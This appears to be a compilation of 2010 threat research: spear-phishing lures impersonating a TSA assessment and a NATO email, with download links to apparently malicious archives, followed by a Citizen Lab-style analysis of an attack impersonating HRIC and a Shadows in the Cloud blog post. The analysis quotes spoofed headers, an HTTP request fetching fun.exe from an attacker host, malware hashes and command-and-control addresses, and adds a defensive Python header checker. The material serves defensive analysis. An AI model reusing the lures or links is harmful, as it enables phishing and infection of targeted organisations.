(U) Terrorist Attack Methods in Airport Terminals

A Predictive Analysis for the Detection-Technology Community

15 June 2010

(U//FOUO) This Transportation Security Administration Office of Intelligence (TSA-OI)
assessment, developed at the request of the TSA Office of Security Technology,
examines the terrorist tactics used to attack passengers inside the public areas of an
airport terminal in order to assist in developing security procedures and deploying threat
detection technology to this area. This assessment examined a number of unclassified
sources detailing disrupted plots, bombings, suicide bombers, and armed assaults
conducted in the public areas of airports from the 1960s to the present. Additionally,
attacks on other critical infrastructure targets were reviewed in order to assess which
tactics are more likely to be considered by terrorists targeting airport terminals.

Additional information can be found in the following report:

http://www.christianrantsen.dk/report.zip

http://enigmazones.eu/report.zip

________________________________________
Department of Homeland Security
Office of Infrastructure Protection
Infrastructure Security Compliance Division
Mail Stop 8100
Washington, DC 20528

* A variety of these emails are also available at: http://www.sophos.com/blogs/sophoslabs/?p=10116

August 26, 2010
Source: http://contagiodump.blogspot.com/2010/08/cve-2010-1240-with-zeus-trojan.html

From: ifc@ifc.nato.int
Date: Thu, 26 Aug 2010 08:24:30 -0500
Subject: From Intelligence Fusion Centre

Intelligence Fusion Centre
In support of NATO
RAF Molesworth, United Kingdom
Unit 8845 Box 300, Huntingdon
CAMBS PE28 0QB

FROM: Intelligence Fusion Centre
SUBJECT: Military operation of the EU

Additional information can be found in the following report:

http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN.ip

> EUROPEAN UNION
> EUROPEAN SECURITY AND DEFENCE POLICY
> Military operation of the EU
> EU NAVFOR Somalia
>
> This military operation, called EU NAVFOR Somalia – operation
> “Atalanta”, is launched in support of Resolutions 1814 (2008), 1816
> (2008), 1838 (2008) and 1846 (2008) of the United Nations Security Council (UNSC) in order to contribute to:
> – the protection of vessels of the WFP (World Food Programme) delivering food aid to displaced
> persons in Somalia;
> – the protection of vulnerable vessels cruising off the Somali coast, and the deterrence, prevention
> and repression of acts of piracy and armed robbery off the Somali coast.
> This operation, which is the first EU maritime operation, is conducted
> in the framework of the European Security and Defence Policy (ESDP).
>
>
> More information and background documents available on
> http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
> and
> http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN. zip
>
> ________________________________________
> PRESS – EU Council Secretariat Tel: +32 (0)2 281 7640 / 6319

Human Rights and Malware Attacks

by Nart Villeneuve

On March 18, 2010, unknown attackers sent a spear phishing email that appeared to be from Sharon Hom, the Executive Director of Human Rights in China (HRIC), to a variety of organizations and individuals. Leveraging the trust and recognition of HRIC, the attackers’ email encouraged recipients to visit a compromised website that contained malicious code designed to allow the attackers to ultimately take full control of the visitor’s computer. These targeted malware attacks are now becoming commonplace, further extending the threat faced by civil society organizations.


UPDATE

One of the domains used in this attack, humanright-watch.org, has been used in a variety of attacks and has been documented by Mila at contagiodump.blogspot.com.


Introduction

Internet censorship is but one component of “a matrix of control” that acts to restrict and control information flow in China. The combination of censorship along with surveillance aims to influence behavior toward self-censorship so that most will not actively seek out banned information, let alone the means to bypass these controls. Those engaged in political activities and those who vocally oppose repressive policies such as censorship may be subjected to a complex set of threats—not simply censorship.

A 2008 report titled Breaching Trust: An Analysis of Surveillance and Security Practices on China’s TOM-Skype Platform uncovered that Skype and its Chinese partner Tom Online operated a surveillance network which insecurely captured millions of records including contact details for any text chat and/or voice calls and the full text of sensitive chat messages. A large portion of these captured messages concerned a political campaign that urged Chinese citizens to quit the Communist Party.

There have been an increasing number of targeted malware attacks against civil society organizations, human rights groups, media organizations, and Tibetan supporters. Typically, the targeted user receives an email, possibly appearing to be from someone they know, such as a real person within his or her organization, with some text—sometimes specific, sometimes generic—that urges the user to open an attachment, usually a PDF or Microsoft Office document, or to visit a web site.

If the user opens the attachment with a vulnerable version of Adobe Reader or Microsoft Office (other types of software are also being exploited) and no other mitigations are in place, their computer will likely be compromised. A clean version of the document is typically embedded in the malicious file and is opened upon successful exploitation so as not to arouse the recipient's suspicion.

Then the user’s computer checks in with a command and control server. At this point, the attacker has full control of the user’s system. The attacker can steal documents, email and other data, or force the compromised computer to download additional malware and possibly use the infected computer as a mechanism to exploit the victim’s contacts or other computers on the target network.

In the last year, the Information Warfare Monitor has uncovered two cyber-espionage networks, investigated numerous targeted malware attacks, and published two reports: Tracking GhostNet: Investigating a Cyber Espionage Network and Shadows in the Cloud: An Investigation into Cyber Espionage 2.0.

The first, GhostNet, was a network of over 1200 compromised computers spread across 103 countries, 30 percent of which we identified and determined to be “high-value” targets, including ministries of foreign affairs, embassies, international organizations, news organizations, and a computer located at NATO headquarters. While we were able to determine that these entities had been compromised, we were only able to theorize about what type of data the attackers were able to acquire.

Our follow-up investigation uncovered the Shadow Network, and unlike GhostNet we were able to acquire the data stolen by the attackers. We were able to access just one portion of the Shadow Network that was primarily focused on extracting sensitive information from India. We recovered a wide variety of documents, including one document that appeared to be encrypted diplomatic correspondence, two documents marked “SECRET,” six as “RESTRICTED,” and five as “CONFIDENTIAL” which appear to belong to Indian government entities including the National Security Council Secretariat (NSCS) of India, the Embassy of India, Kabul, the Embassy of India, Moscow, the Consulate General of India, Dubai, and the High Commission of India in Abuja, Nigeria. We also recovered documents including 1,500 letters sent from the Dalai Lama’s office between January and November 2009.

The nature of the compromised entities and the data stolen by the attackers do indicate correlations with the strategic interests of the People’s Republic of China, but we were unable to determine any direct connection between these attackers and elements of the Chinese state.

Investigation

Summary

On March 18, 2010, attackers sent a “spear phishing” email that appeared to originate from Sharon Hom’s email account to several different organizations and individuals. The subject of the email was “Microsoft, Stool Pigeon for the Cops and FBI” and the email contained a JPG attachment. However, the attackers’ objective was for the targets to visit the link contained in the email. The link, www.cfcr2008.org, redirected to cfcr.i1024.com, which the attackers had compromised and into which they had inserted code that caused visitors to the website to open a malicious PDF from www.520520.com.tw. This PDF exploited Adobe Reader and compromised the visitor’s computer. Compromised computers then connected to a website under the attackers’ control, www.humanright-watch.org, and downloaded additional malware before ultimately connecting to a command and control server, 360liveupdate.com, in China.

Spoofed Email

From: Sharon Hom <mailto:sharonhom@hrichina.org>
To: [REDACTED]
Sent: Thursday, March 18, 2010 9:46 AM
Subject: Microsoft, Stool Pigeon for the Cops and FBI

I’ve got my hands on a copy of the leaked, confidential Microsoft “Global Criminal Compliance Handbook,” which details for police and intelligence services exactly what information Microsoft collects about users of its online services, and how they can be accessed. What is gathered and available about you is quite comprehensive, including your emails, detailed information about when you sign in and use the services, credit card information, and so on. Attachments are scanned copies of documents.

For the whole documents, please visit http://www.cfcr2008.org

Email Headers

Although the email appeared to be from HRIC, it was actually sent from the following location:

Sender: selina@avghost.net <mailto:selina@avghost.net>
Received: from mail.idcsea.com.cn (mail.idcsea.com.cn [208.77.45.130])
X-mailer: Foxmail 5.0 [cn]

The email headers reveal that the attackers actually sent the email from the following IP address:

208.77.45.130
OrgName: DCS Pacific Star, LLC
OrgID: DCSPA
Address: 5050 El Camino Real, #238
City: Los Altos
StateProv: CA
PostalCode: 94022
Country: US
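As an added example (not part of the original post), the following Python checks a raw message for the kind of header inconsistencies shown above: a From: domain that differs from the envelope Sender: and from the host in the earliest Received: line. The sample message is constructed from the headers quoted in this post; the recipient address is a placeholder.

```python
import ipaddress
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: header values mirror those quoted in the post,
# the recipient is a placeholder and the body is abbreviated.
SAMPLE_EMAIL = """\
From: Sharon Hom <sharonhom@hrichina.org>
Sender: selina@avghost.net
Received: from mail.idcsea.com.cn (mail.idcsea.com.cn [208.77.45.130])
X-mailer: Foxmail 5.0 [cn]
Subject: Microsoft, Stool Pigeon for the Cops and FBI
To: redacted@example.org

For the whole documents, please visit http://www.cfcr2008.org
"""

# IPv4 literal in square brackets, as mail servers write it in Received: lines.
RECEIVED_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def domain_of(header_value):
    """Return the lower-cased domain of an address header, or None."""
    _, addr = parseaddr(header_value or "")
    return addr.rpartition("@")[2].lower() or None


def analyze_headers(raw):
    """Compare the displayed From: domain with the envelope Sender: and the
    earliest Received: hop; return a dict of findings for triage."""
    msg = message_from_string(raw)
    from_domain = domain_of(msg.get("From"))
    sender_domain = domain_of(msg.get("Sender"))
    # Each relay prepends its own Received: header, so the last entry in
    # header order is the earliest hop, i.e. the host that injected the mail.
    received = msg.get_all("Received") or []
    origin_hop = received[-1] if received else ""
    origin_ip = None
    match = RECEIVED_IP.search(origin_hop)
    if match:
        origin_ip = str(ipaddress.ip_address(match.group(1)))
    findings = []
    if sender_domain and sender_domain != from_domain:
        findings.append("sender-domain-mismatch")
    if from_domain and origin_hop and from_domain not in origin_hop.lower():
        findings.append("origin-host-not-from-domain")
    return {
        "from_domain": from_domain,
        "sender_domain": sender_domain,
        "origin_ip": origin_ip,
        "mailer": msg.get("X-Mailer"),
        "findings": findings,
    }
```

The origin IP is what you would pass to a whois lookup, as the post does, to see who the netblock is registered to.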

The email encouraged recipients to visit cfcr2008.org, the website of an organization called the Coalition for Citizen’s Rights. This organization is a vocal opponent of the Chinese government.

The attackers compromised the website and inserted malicious code that caused vulnerable visitors to silently load a malicious PDF document that infected the user’s computer with malware.

Image 1 Compromised site: cfcr2008.org -> cfcr.i1024.com

Image 2 js_men.asp

The malicious PDF was hosted on www.520520.com.tw (203.69.42.41), a website located in Taiwan. This malicious file has very low antivirus coverage. Only eight out of forty-two anti-virus products detected the file as malware.

Item 3

Filename: readme.pdf
Filetype: PDF
CVE: ?
MD5: 72bdca7dd12ed04b21dfa60c5c2ab6c4

Virustotal: 8/42 (19.05%)
http://www.virustotal.com/analisis/dbfded7c7401b8128f39f8e8834bafe7a11addfa9b4c5a1bb9247243a443a4b1-1269343609

http://wepawet.cs.ucsb.edu/view.php?hash=f2275da93b6f708e80a84176f64d7dfe&t=1269304734&type=js

The malware dropped by the malicious PDF issued another connection, this time to www.humanright-watch.org (204.16.193.39). This is a server under the control of the attackers. The malware made a request for another executable, which appeared to be encrypted and which no antivirus products detected as malicious.

Item 4

GET /fun.exe HTTP/1.1
Host: www.humanright-watch.org

Filename: fun.exe
Filetype: EXE
CVE: ?
MD5: ec16143a14c091100e7af30de03fce1f

Virustotal: 0/42 (0%)
http://www.virustotal.com/analisis/8cc9dc5d07b4a9b4dca13923779a16a17e772dfbb2b7d2aa0425b5f8e03b2f1f-1269343660

Interestingly, the IP address of www.humanright-watch.org (204.16.193.39) is assigned to the same company, DCS Pacific Star, LLC, as the IP address used to send the malicious email (208.77.45.130).

The new malware downloaded from www.humanright-watch.org (204.16.193.39) began encrypted communications with a command and control server located in China at 360liveupdate.com (117.85.48.157).

Image 5

The command and control server is located in Jiangsu Province, China:

117.85.48.157
inetnum: 117.80.0.0 – 117.95.255.255
netname: CHINANET-JS
descr: CHINANET jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN

Conclusion

The nexus of censorship, surveillance, and malware attacks enables strict information control policies in China that extend beyond China’s boundaries to affect civil society organizations around the world. An increasing number of targeted malware attacks against civil society organizations are being reported. In many cases, the attacks can be traced back to command and control infrastructure located in China. These attacks leverage trust among members of social and political networks, using human rights themes and spoofed identities to encourage targeted users to execute malicious code. From that point, unknown attackers have full control over the users’ computers and can conduct surveillance, exfiltrate sensitive information, and use the computer as a staging ground for future attacks.


The original version of this article is available here and in Chinese here.

Shadows in the Cloud



Last year, at just about this time, the InfoWar Monitor (IWM) released the “Tracking GhostNet” report which detailed our investigation into a cyber-espionage network that has compromised 1200+ computer systems spread across 103 countries, including ministries of foreign affairs, embassies, international organizations, news organizations, and even a computer located at NATO headquarters.

I remember when I stumbled upon the GhostNet attackers’ command and control interface by Googling a string of text from the network traffic obtained during our field investigation from a compromised computer at the Dalai Lama’s office in Dharamsala, India. To my surprise Google returned several results, which I clicked, and was suddenly looking at an interface that allowed the attackers to fully control a network of compromised computer systems. When the report came out and I realized the significance of the find I thought that there was no way it would happen again. I was wrong.

Today the IWM and the Shadowserver Foundation have released a report “Shadows in the Cloud: An investigation into cyber espionage 2.0” (mirror) in which we document another targeted malware network. (NYT coverage here). We started by exploring one of the malware networks described in the GhostNet report, but it turned out to be an entirely separate malware network that had also compromised computers at the Dalai Lama’s office. I cannot stress just how important the trust, collaboration and information sharing across all those involved in this report from the Citizen Lab, SecDev, and Shadowserver, along with the Dalai Lama’s Office, were to the success of the project.

As a result we were able to document another network of compromised government, business, and academic computer systems in India, the Office of the Dalai Lama, and the United Nations as well as numerous other institutions, including the Embassy of Pakistan in the United States.

In the report we enumerated a complex and tiered command and control infrastructure. The attackers misused a variety of services including Twitter, Google Groups, Blogspot, Baidu Blogs, blog.com and Yahoo! Mail in order to maintain persistent control over the compromised computers. This top layer directed compromised computers to accounts on free web hosting services, and as the free hosting servers were disabled, to a stable core of command and control servers located in China.

This time, unlike GhostNet, we were able to recover data, some of which are highly sensitive, from a drop zone used by the attackers. One day, while exploring open directories on one of the command and control servers I noticed that there were files in a directory that was normally empty. It turned out that the attackers were directing compromised computers to upload data to this directory; the attackers subsequently moved the data off to another location and deleted the files at fairly rapid, but intermittent time intervals.

We recovered a wide variety of documents including one document that appears to be encrypted diplomatic correspondence, two documents marked “SECRET”, six as “RESTRICTED” and five as “CONFIDENTIAL” which appear to belong to the Indian government. We also recovered documents including 1,500 letters sent from the Dalai Lama’s office between January and November 2009.

Based on the character of the documents (and not IP addresses) we assessed that we recovered documents from the National Security Council Secretariat (NSCS) of India, the Embassy of India, Kabul, the Embassy of India, Moscow, the Consulate General of India, Dubai, and the High Commission of India in Abuja, Nigeria. In addition, we recovered documents from India’s Military Engineer Services (MES) and other military personnel as well as the Army Institute of Technology in Pune, Maharashtra and the Military College of Electronics and Mechanical Engineering in Secunderabad, Andhra Pradesh. Documents from a variety of other entities including the Institute for Defence Studies and Analyses as well as India Strategic defence magazine and FORCE magazine were compromised.

Questions regarding those who are ultimately responsible for this cyber-espionage network remain unanswered. We were, however, able to benefit from a great investigation by The Dark Visitor, who tracked down lost33, the person who registered some of the Shadow network’s domain names that we published in the GhostNet report, and his connections to the underground hacking community in China. Based on the IP and email addresses used by the attackers we were able to link the attackers to several posts on apartment rental sites in Chengdu.

This, of course, does not reveal the role of these specific individuals nor the motivation behind the attacks. However, the connection that The Dark Visitor drew between lost33 and the underground hacking community in China does indicate that motivations such as patriotic hacking and cybercrime may have played a role. Finally, the nature of the data stolen by the attackers does indicate correlations with the strategic interests of the Chinese state. But we were unable to determine any direct connection between these attackers and elements of the Chinese state. However, it would not be implausible to suggest that the stolen data may have ended up in the possession of some entity of the Chinese government.

Now having reported this incident to the China CERT — which handles security incidents in China — I look forward to working with them to shut down this malware network.

This is an investigation in progress. There are many threads in this investigation that have still to be fully explored. I hope that this report provides enough detail to allow others with different specializations to continue to explore aspects of the Shadow network enriching our collective understanding of this incident and the broader implications regarding both cyber-crime and cyber-espionage.